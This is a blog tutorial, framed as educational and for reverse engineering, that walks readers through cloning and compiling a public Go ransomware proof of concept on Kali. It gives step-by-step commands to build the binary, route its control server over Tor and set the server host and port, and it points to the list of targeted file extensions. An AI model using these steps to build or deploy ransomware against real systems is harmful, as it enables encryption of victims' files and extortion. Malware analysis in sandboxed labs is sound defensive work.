CyberMoransš¤
Today you will taste the dark sideš
The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom š¤ demonstrating the danger of this ransomware to industrial systems and a state infrastructureš The major US insurance company, CNA, admitted to having paid a ransom of $40 million!
And closer to home š, recent attacks ā ļø on Kenya Aviation Authority (KAA) by Medusa ransomware gang and Jubilee insurance is believed to have paid š¤ Lockbit, the most prolific Ransomware Gang ā , an unknown amount of ransom after appearing as a victim on their dark web data leaks onion site in March 2023š
To understand how ransomware works we will build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposesāŗļø but rather to help us understand how ransomware works. Like the new variant, Snake ransomware š°, and a growing number of malware strains, this ransomware is written in Golang š§
The ransomware will encrypt with AES-256-CTR and use RSA-4096 to secure the data exchange with the server š° This ransomware will be very similar to Cryptolocker, one of the most successful ransomware attacks in history š£
This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack
ā ļø ā ļø THIS IS FOR EDUCATIONAL PURPOSES ONLY -- AND REVERSE ENGINEERING ā ļø ā ļø -- Be cool š
Morans, Lets do this šŖ
š Download and Install the Binaries
The first step is to fire up your Linux and install golang š
kali > sudo apt install golang
Next, you will need to login to the root user š
kali > sudo su -
Create a directory for the binaries. In this case, I named it simply "Azimio" š
kali > mkdir Azimio
Next, change directory to this directory š
kali > cd Azimio
Next, download the binaries from github.com š
kali > git clone https://github.com/mauri870/ransomware
Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories š
š Make the source code dependencies
With the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps š
kali > cd ransomware
kali > make deps
š Make the Source Code with options
Now we begin to make the source code. In this case, we will use a few optionsāŗļø
š First, we want to use ToR to encrypt our communications over the ToR network š
USE_TOR=true
š Second, we want to use our local IP at 10.0.0.5 (you can use any domain even on a cloud service) š
SERVER_HOST=10.0.0.5
š Third, we want to use port 8080 (you can use any port) š
SERVER_PORT=8080
š Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux š
GOOS=linux
The command looks something like this š
kali > make -e USE_TOR=true SERVER_HOST=10.0.0.5 SERVER_PORT=8080 GOOS=linux
hit ENTER and let your ransomware compile -- Dance kidogoš
š Check the Directory for ransomware.exe
Once the source code has been generated, do a long listing on the ransomware directory š
kali > ls -l
navigate to the bin directory. Here, you will see the ransomware.exe, the server and unlocker.exe š
kali > cd bin
š Examine the Types of Files to be Encrypted
To see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go š
kali > cd cmd
kali > more common.go
You can see the file extensions that the ransomware will target to encrypt when executedš Now you can load up your test VMs, debuggers, and reverse engineering tools like ghidra and IDApro to reverse engineer this ransomware. Give it a cool name as well...I named this Kenyatta Ransomware š
Remember to take a snapshot of your test VM before deploying the ransomware. DO NOT deploy this ransomware on your main machine!! š
šConclusion š¤
Subscribe to receive notifications of similar posts š where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...š
Follow me on twitter for daily Infosec Memes and shenanigansš
Morans,
Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! šš šŖ
Comments